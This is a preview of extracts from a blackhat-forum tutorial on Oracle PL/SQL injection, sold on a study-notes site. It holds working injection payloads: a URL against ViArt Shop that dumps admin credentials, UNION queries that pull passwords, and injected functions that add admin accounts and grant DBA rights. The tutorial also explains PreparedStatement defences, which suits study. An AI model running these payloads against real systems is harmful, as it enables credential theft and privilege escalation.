Search for notes by fellow students, in your own course and all over the country.
Browse our notes for titles which look like what you need, you can preview any of the notes via a sample of the contents. After you're happy these are the notes you're after simply pop them into your shopping cart.
Title: Hacking
Description: It's a complete notes on Oracle PL/SQL Injection of Ethical Hacking
Description: It's a complete notes on Oracle PL/SQL Injection of Ethical Hacking
Document Preview
Extracts from the notes are below, to see the PDF you'll receive please use the links above
Aelphaeis Mangarae
[IRC
...
Org +6697/6667 #BHF]
[http://blackhat-forums
...
Definer Rights
What Is SQL Injection?
8
-Introduction
-What Programming Languages are Vulnerable?
-Example: SQL Injection Exploitation
-SQL Injection Oracle vs
...
Like many
vulnerabilities PL/SQL Injection is possible because user input is not validated or in other cases
the validation is not sufficient and can be bypassed
...
I will also start with an Introduction into SQL
Injection and then an Introduction into PL/SQL
...
This paper does not go over auditing Oracle database objects for vulnerabilities
...
There are vulnerabilities in some of the thousands of packages, procedures and functions
provided by Oracle in the DBMS
...
A Glance at Oracle Application Express
What Is Oracle APEX
Oracle Application Express (previously HTMLDB, before 2006) is free web based environment for
creating web application front ends (rapid application development) for an Oracle DBMS
...
Oracle APEX is
compatible with Oracle 9
...
Architecture of Oracle APEX
With Oracle Database 11
...
The embedded PL/SQL gateway runs in the XML DB HTTP
server in the Oracle database and includes the core features of mod_plsql, but does not require the Oracle
HTTP Server powered by Apache
...
mod_plsql / XML DB HTTP
MOD_PLSQL is an Apache (Web Server) extension module that allows one to create dynamic
web pages from PL/SQL packages and stored procedures
...
MOD_PLSQL was formerly called
the Oracle PL/SQL Cartridge and OWA (Oracle Web Agent)
...
orafaq
...
htm
Usually if XML XB HTTP that is built into Oracle APEX isn’t used then mod_plsql is used with
Apache web server
...
Example:
http://serverdomain
...
GET_EMP_BY_LASTNAME?LAST_NAME=MANGARAE
What Can You Create With Oracle APEX?
As I mentioned above APEX is built for rapid application development, you can create an array of
things relating to your database(s)
...
Data Entry Form
Report
Oracle APEX & PL/SQL
PL/SQL Packages, Procedures and Functions can be created in the SQL Workshop
...
I will be using the SQL Command Line in Oracle APEX shown below
...
Definer Rights
By default in Oracle DBMS procedures, functions, packages etc will execute with the rights of the
definer
...
When using Invoker Rights the procedure or function will execute with the rights of the invoker as
well as the context of the Schema of that user
...
Invokers Rights are implemented into a PL/SQL Procedure or Function using the AUTHID
keyword
...
That remains true until a procedure or function created with definer rights is called, in which
case the owner of that Procedure or Function becomes the current user
...
When the definer rights code exits, control reverts to the previous current user
...
According to Wikipedia:
SQL injection is a technique that exploits a security vulnerability occurring in the database layer
of an application
...
This is true, however saying “occurring in the database layer of an application” is a very brief
thing to say
...
Although when the vulnerability is exploited any poor security in the
DBMS can be exploited by an attacker
...
This is usually possible because the
string that is passed to the DBMS contains user input which is not properly validated
...
Part of the attacker string might
include something to end the statement or comment out the rest
...
NET, PHP, Java, JSP, Perl, Python, Ruby and
more
...
Below is a Java code example of some code that is vulnerable to SQL Injection:
String SQLSTMT = “SELECT * FROM EMPLOYEES WHERE LAST_NAME =” + _lastName
...
createStatement(); //con being a database Connection object
...
executeUpdate(SQLSTMT);
The user input into _lastName is the point of Injection
...
It is clear that is the user input that makes up part of the SQL statement is not validated
...
The SQL statement itself is not validated before being passed for execution by the
database, although I would imagine #1 would be implemented rather than this
...
The string that contains the SQL statement is made by simply concatenating strings,
rather than using something safer such as PreparedStatement’s to put together an SQL
statement
...
PreparedStatement SQLSTMT = con
...
setString(1, _lastName
...
executeUpdate();
Prepared statements are used in Java to safely put together SQL statements
...
sun
...
html
Example: SQL Injection Exploitation
Software: ViArt Shop <= 3
...
viart
...
$table_prefix
...
$category_id
...
$table_prefix
...
$category_id
...
php?category_id=1' UNION SELECT 0,
CONCAT(login,char(58),password) FROM va_admins -- /*
Exploit Explained:
The query is escaped by using a single quote; a UNION is then used to join onto the existing
SELECT statement
...
Then an integer is because of the category_id column is of type Integer
...
The double hyphen ( -- ) in SQL is
used for comments, used to comment out the rest of the SQL query
...
SQL Injection Oracle vs
...
UNION Statements – Column Data Types
Oracle is very strict about the data types of columns in a UNION statement being the same as
those in the SELECT statement
...
Harder to Execute Operating System Commands
Although it is possible to execute operating system commands through Oracle, it is not as simple
as other DBMS (such as MySQL, Sybase, MS SQL) that have built in functions that can be used
to execute commands
...
PL/SQL Overview
Introduction
Programming Language SQL (Structured Query Language) is a Programming language for
Oracle DBMS made by Oracle Corporation
...
The language is used mainly for DML (Data Manipulation Language) and DDL (Data Definition
Language), any use of DDL in PL/SQL will have an implicit commit
...
Basic code structure:
DECLARE –Optional PL/SQL variables are declared after DECLARE
BEGIN
EXCEPTION –Optional, for exception Handling
...
NVARCHAR2(SIZE)
A national character string of a specified length
...
NCHAR(SIZE)
NCHAR stores fixed length national character strings
...
Numbers of
virtually any magnitude can be stored and are guaranteed portable among
different systems
BOOLEAN
The Boolean datatype is used to store TRUE, FALSE and NULL
%TYPE
The same type as the corresponding database column
...
BFILE
The BFILE datatype stores unstructured binary data in operating-system
files outside the database
...
BLOBs can store up to 8 terabytes of binary data
...
NCLOB
The NCLOB datatype can store up to 8 terabytes of national character
data in the database
...
A PL/SQL procedure cannot return
a value, unless IN or OUT parameters are used, but it can of course receive parameters, such as
what is in red below
...
CREATE OR REPLACE PRODECURE INSERTNewEmployee(p_LAST_NAME VARCHAR2, p_EMAIL
VARCHAR2, p_HIRE_DATE DATE, p_JOB_ID VARCHAR2)
AS
BEGIN
INSERT INTO EMPLOYEES(LAST_NAME, EMAIL, HIRE_DATE, JOB_ID)
VALUES(p_LAST_NAME, p_EMAIL, p_HIRE_DATE, p_JOB_ID);
COMMIT;
END;
Calling a Procedure:
INSERTNewEmployee(‘Mangarae’, ‘admin@bhf
...
Functions
What is a PL/SQL Function?
A PL/SQL Function is similar to a Procedure; the difference being is that a PL/SQL Function will
have a return value, which is shown in red below
...
PUT_LINE(NOEMPLOYEES);
END;
Calling a Function:
CountEmployees();
Calling a Function from SQL Plus:
CALL CountEmployees();
Packages
What is a PL/SQL Package?
A PL/SQL package is a collection of things in PL/SQL such as Procedures, Functions, Cursors,
Variables package together
...
Syntax of Package Specification:
CREATE [OR REPLACE] PACKAGE package_name
[AUTHID {CURRENT_USER | DEFINER}]
{IS | AS}
[PRAGMA SERIALLY_REUSABLE;]
[collection_type_definition
...
]
[subtype_definition
...
]
[constant_declaration
...
]
[object_declaration
...
]
[variable_declaration
...
]
[function_spec
...
]
[call_spec
...
]
END [package_name];
The package specification is a public declaration and the interface for the package and the
contents of the package body
...
]
[record_type_definition
...
]
[collection_declaration
...
]
[exception_declaration
...
]
[record_declaration
...
]
[cursor_body
...
]
[procedure_spec
...
]
[BEGIN
sequence_of_statements]
END [package_name];]
:
The package body is privately declared and is not visible to the public
...
type_name();
package_name
...
subprogram_name();
package_name
...
type_name();
CALL package_name
...
subprogram_name();
CALL package_name
...
oracle
...
920/a96624/09_packs
...
A trigger unlike a Procedure is
not called on the command line or by a function, procedure but rather ran or “triggered” on event
of changes being made to a table in the database
...
The trigger can be made so it can be “fired” either
BEFORE or AFTER the Data Manipulation Language is executed, shown in green below
...
acs
...
edu/docs/Oracle/server
...
htm
Executing Database Commands
There are less than a few ways to execute database commands in PL/SQL
...
Preparing a string that contains and SQL statement and passing it to EXECUTE [IMMEDIATE]
...
Using one of the DBMS_SQL functions to execute database commands
...
Declaring a Cursor and FETCHing rows into the Cursor (only SELECT statements
...
)
PL/SQL Cursors
A Cursor in PL/SQL is used when you have a SELECT statement that returns more than one row
and you would like to be able to do what you wish with the results
...
Cursor Status
PL/SQL Cursor Variable
%FOUND
%NOTFOUND
%ISOPEN
%ROWCOUNT
State of Operation
Implicit Cursors
An implicit cursor is created every time you execute a SELECT or DML statement in Oracle SQL
...
DECLARE
BEGIN
SELECT * FROM EMPLOYEES WHERE EMPLOYEE_ID = 1;
IF SQL%NOTFOUND THEN
…
…
END;
When checking the status of an implicit cursor, a cursor variable corresponds to the last SQL
statement that needed an implicit cursor and the “SQL” keyword is used instead of the cursor
name
...
DECLARE
Cursor all_employees IS
SELECT * FROM EMPLOYEES;
employee all_employees%ROWTYPE;
BEGIN
OPEN all_employees
LOOP
EXIT WHEN all_employees %NOTFOUND;
FETCH all_employees INTO employee;
DBMS_OUTPUT
...
LAST_NAME);
END LOOP;
CLOSE all_employees;
END;
Inserting Rows into a Cursor
If you look at the example above, you can see:
1
...
3
...
The cursor declaration
The cursor being OPENed
The cursor having Rows inserted using FETCH
The cursor is closed
PL/SQL Injection
What is PL/SQL Injection?
PL/SQL Injection is the injection of attacker supplied data into a PL/SQL Function, Procedure,
Package or Trigger
...
PL/SQL injection is mostly done into SQL queries,
however can be done into Oracle database functions as well
...
PUT_LINE(BUFFER);
EXIT WHEN SQLSTMT%NOTFOUND;
END LOOP;
CLOSE SQLSTMT;
END;
/
Note: For the purpose of being an easy example the above PL/SQL Procedure outputs each row
...
Exploitation: Injecting into a Procedure->SELECT Statement
How do we exploit this? We are injecting into a Procedure which has one argument, one point of
injection
...
TYPE C_TYPE IS REF CURSOR;
SQLSTMT C_TYPE;
We are injecting into a SELECT statement so no DML can be injected
...
http://www
...
com/sql/sql_union
...
In other databases such as MySQL the CONCAT() function can be used to concatenate multiple
strings together, this is obviously useful for SQL Injection
...
Exploitation:
BEGIN
GET_EMP_BY_LASTNAME(‘King’’ UNION SELECT CONCAT(USER_NAME,PASSWORD) FROM USERS
WHERE ‘’x’’=’’x’);
END;
Output:
001_KING_Stevenkhd983fuJedEF
002_Cage_Johnnym0rtalc0mbat
003_Spartanmasterchief
004_Rose_Mia3xplicit_
Aelphaeiscr4ckh34d
Janette
Steven
Steven
Statement processed
...
00 seconds
Injecting into Data Manipulation Language
Injecting into DML is quite easy and can be done with user defined functions
...
UPDATE_ADMIN_PASS Vulnerable Procedure:
CREATE OR REPLACE PROCEDURE UPDATE_ADMIN_PASS( USERNAME VARCHAR2, NPASSWORD
VARCHAR2 )
AS
UPDATESTMT VARCHAR2(300);
BEGIN
UPDATESTMT := 'UPDATE ADMINS SET PASSWORD = ''' || NPASSWORD || ''' WHERE USER_NAME =
''' || USERNAME || '''';
DBMS_OUTPUT
...
In APEX if you want to look at the GRANT privileges given to a database object you can go to the
Object Browser and have a look from there
...
What we aim to do is inject our own Function which executes DML into this Procedure that our
user account has been granted access to
...
UPDATE_ADMIN_PASS( 'SYSOP2', 'password''||
HR
...
Of course changing an existing
password for a user is almost as useful as doing an INSERT of a new one
...
INSERT_AELPHAEIS_ADMIN Attacker Defined Function
CREATE OR REPLACE FUNCTION INSERT_AELPHAEIS_ADMIN
RETURN VARCHAR2
AUTHID CURRENT_USER
AS
PRAGMA AUTONOMOUS_TRANSACTION;
INSERTSTMT VARCHAR2(300);
BEGIN
INSERTSTMT := 'INSERT INTO ADMINS(DATE_CREATED, USER_NAME, PASSWORD)
VALUES('''||SYSDATE||''', '''||'Aelphaeis'||''', '''||'password'||''')';
EXECUTE IMMEDIATE INSERTSTMT;
COMMIT;
RETURN 'SHIT';
END;
SELECT * FROM ADMINS;
You can see above that my defined Function was injected and executed, and the user
“Aelphaeis” is inserted
...
As well as executing database commands with
elevated privileges by exploitation, Injecting into database objects that are not defined with
Invokers rights
...
What is in Green in the Attacker Procedure is explained in the next section of this paper
...
NEW_ADMIN(‘Aelphaeis’,
‘password’’|| HR
...
PUT_LINE(SQLSTMT);
EXECUTE IMMEDIATE SQLSTMT;
END;
User: HR
User: SYSTEM
Rights: Definer
User: HR
Rights: Invoker
Output:
INSERT INTO ADMINS(DATE_CREATED, USER_NAME, PASSWORD) VALUES('24-AUG-08',
'SYSOP2', 'p07hf6523aseix'|| HR
...
The GET_DBA_F function defined by the attacker gave DBA privileges to user HR
...
However with the use of a line of code in our function that is injected we can
...
When specifying a Procedure, Function or Trigger as AUTONOMOUS_TRANSACTION you are
Specifying that the database object you are creating will execute fully independent of anything
else and will not share any locks or dependencies
...
If we take the following Procedure as an example:
GET_EMP_BY_LASTNAME Vulnerable PL/SQL Procedure:
CREATE OR REPLACE PROCEDURE GET_EMP_BY_LASTNAME( LASTNAME VARCHAR2 )
AS
TYPE C_TYPE IS REF CURSOR;
SQLSTMT C_TYPE;
BUFFER VARCHAR2(300);
BEGIN
OPEN SQLSTMT FOR 'SELECT FIRST_NAME FROM EMPLOYEES WHERE LAST_NAME =' || '''' ||
LASTNAME || '''';
LOOP
FETCH SQLSTMT INTO BUFFER;
DBMS_OUTPUT
...
Defining a function with AUTONOMOUS_TRANSACTION means we can exploit a vulnerable
Procedure, Function or Trigger and execute it as something fully independent
...
com'', ''08-AUG-08'', ''AD_PRES'', 999999)';
EXECUTE IMMEDIATE INSERTSTMT;
COMMIT;
RETURN 'SHIT';
END;
BEGIN
GET_EMP_BY_LASTNAME(‘King’’|| INSERT_NEW_EMPLOYEE –‘);
END;
If we inject the above function into the vulnerable Procedure we get this message:
This is because the function we have injected is not being executed independently and has not
been defined as an Autonomous Transaction using: PRAGMA AUTONOMOUS_TRANSACTION;
If we add the above string and try again to exploit the Procedure GET_EMP_BY_LASTNAME
...
”
Well the fact is it does, and it isn’t just to other people who are exploited by script kiddies
...
Hackers (or what ever you want to call
yourself) shouldn’t have to help programmers with their poor programming
...
Reasons Why Not To Publish Exploits (Or Vulnerability Information):
* Gives script kiddies more tools in their already large arsenal
...
* Programmers become more aware of bad coding habits/techniques and security conscious,
leaving less room for mistakes, and of course exploitation
...
* Your feeding the Security Industry and giving them exactly what they want
...
IT Security “experts” love to take credibility for providing security solutions to
security vulnerabilities
...
RifRaf – Thanks for moderating BHF, hope to see you again sometime
...
Title: Hacking
Description: It's a complete notes on Oracle PL/SQL Injection of Ethical Hacking